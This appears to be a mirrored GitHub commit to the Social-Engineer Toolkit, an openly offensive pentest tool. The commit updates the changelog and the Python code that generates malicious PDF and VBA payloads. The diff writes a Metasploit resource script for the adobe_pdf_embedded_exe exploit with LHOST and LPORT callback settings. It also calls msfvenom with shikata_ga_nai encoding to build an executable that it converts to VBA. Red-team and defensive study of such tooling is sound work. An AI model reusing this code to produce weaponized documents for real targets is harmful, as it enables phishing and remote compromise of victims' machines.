mirror of
https://github.com/trustedsec/social-engineer-toolkit
synced 2025-04-04 14:56:08 +00:00
Fixed PDF creation when using templates and metasploit payloads
This commit is contained in:
parent
cb8f3181e2
commit
70ac5cc92c
2 changed files with 32 additions and 11 deletions
|
@ -1,3 +1,10 @@
|
|||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.4
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
||||
* fixed pdf template creation when using file format attack vector on option number one - was due to msfcli being removed - converted over to msfconsole
|
||||
* fixed using infectious media generator using pdf template
|
||||
|
||||
~~~~~~~~~~~~~~~~
|
||||
version 6.5.3
|
||||
~~~~~~~~~~~~~~~~
|
||||
|
|
|
@ -108,20 +108,17 @@ if exploit == "exploit/windows/fileformat/adobe_pdf_embedded_exe" or exploit ==
|
|||
if inputpdf == "":
|
||||
# change to default SET pdf
|
||||
print_info("Defaulting to BLANK PDF built into SET...")
|
||||
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
|
||||
inputpdf="src/core/msf_attacks/form.pdf"
|
||||
# if no file exists defalt this
|
||||
if not os.path.isfile(inputpdf):
|
||||
print_warning("Unable to find PDF, defaulting to blank PDF.")
|
||||
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
|
||||
# if pdf exists, we are good
|
||||
if os.path.isfile(inputpdf):
|
||||
inputpdf="INFILENAME="+inputpdf
|
||||
inputpdf="src/core/msf_attacks/form.pdf"
|
||||
|
||||
if choicepdf == '2':
|
||||
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
|
||||
inputpdf="src/core/msf_attacks/form.pdf"
|
||||
|
||||
if choicepdf == "":
|
||||
inputpdf="INFILENAME=src/core/msf_attacks/form.pdf"
|
||||
inputpdf="src/core/msf_attacks/form.pdf"
|
||||
|
||||
exploit_counter=0
|
||||
|
||||
|
@ -166,9 +163,26 @@ if exploit_counter == 0:
|
|||
print_info("Generating fileformat exploit...")
|
||||
# START THE EXE TO VBA PAYLOAD
|
||||
if exploit != 'custom/exe/to/vba/payload':
|
||||
outfile = setdir + "/%s" % (outfile)
|
||||
subprocess.Popen("%s/msfcli %s PAYLOAD=%s LHOST=%s LPORT=%s OUTPUTPATH=%s FILENAME=%s %s ENCODING=shikata_ga_nai %s E" % (meta_path,exploit,payload,rhost,lport,outpath,outfile,target,inputpdf), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True).wait()
|
||||
subprocess.Popen("cp " + users_home + "/.msf4/local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
||||
output = setdir + "/%s" % (outfile)
|
||||
if os.path.isfile(setdir + "/template.pdf"):
|
||||
os.remove(setdir + "/template.pdf")
|
||||
if os.path.isfile(users_home + "/.msf4/local/template.pdf"):
|
||||
os.remove(users_home + "/.msf4/local/template.pdf")
|
||||
|
||||
filewrite = file(setdir + "/template.rc", "w")
|
||||
filewrite.write("use exploit/windows/fileformat/adobe_pdf_embedded_exe\nset LHOST %s\nset LPORT %s\nset INFILENAME %s\nset FILENAME %s\nexploit\n" % (rhost,lport,inputpdf,output))
|
||||
filewrite.close()
|
||||
subprocess.Popen("%s/msfconsole -r %s/template.rc" % (meta_path, setdir), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
|
||||
while 1:
|
||||
if os.path.isfile(setdir + "/template.pdf"):
|
||||
subprocess.Popen("cp " + users_home + "/.msf4/local/%s %s" % (filename_code, setdir), stderr=subprocess.PIPE, stdout=subprocess.PIPE, shell=True)
|
||||
break
|
||||
else:
|
||||
print_status("Waiting for payload generation to complete...")
|
||||
if os.path.isfile(users_home + "/.msf4/local/" + outfile):
|
||||
subprocess.Popen("cp %s/.msf4/local/%s %s" % (users_home, outfile,setdir), shell=True).wait()
|
||||
time.sleep(3)
|
||||
|
||||
print_status("Payload creation complete.")
|
||||
time.sleep(1)
|
||||
print_status("All payloads get sent to the %s directory" % (outfile))
|
||||
|
@ -183,7 +197,7 @@ if exploit_counter == 0:
|
|||
payloadname=("vb.exe")
|
||||
subprocess.Popen("%smsfvenom -p %s %s %s -e shikata_ga_nai --format=%s > %s/%s" % (meta_path,payload,rhost,lport,execute1,setdir,payloadname), shell=True).wait()
|
||||
if noencode == 0:
|
||||
subprocess.Popen("%smsfencode -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True).wait()
|
||||
subprocess.Popen("%smsfvenom -e x86/shikata_ga_nai -i %s/vb1.exe -o %s/vb.exe -t exe -c 3" % (meta_path,setdir,setdir), shell=True).wait()
|
||||
# Create the VB script here
|
||||
subprocess.Popen("%s/tools/exe2vba.rb %s/vb.exe %s/template.vbs" % (meta_path,setdir,setdir), shell=True).wait()
|
||||
print_info("Raring the VBS file.")
|
||||
|
|
Loading…
Add table
Reference in a new issue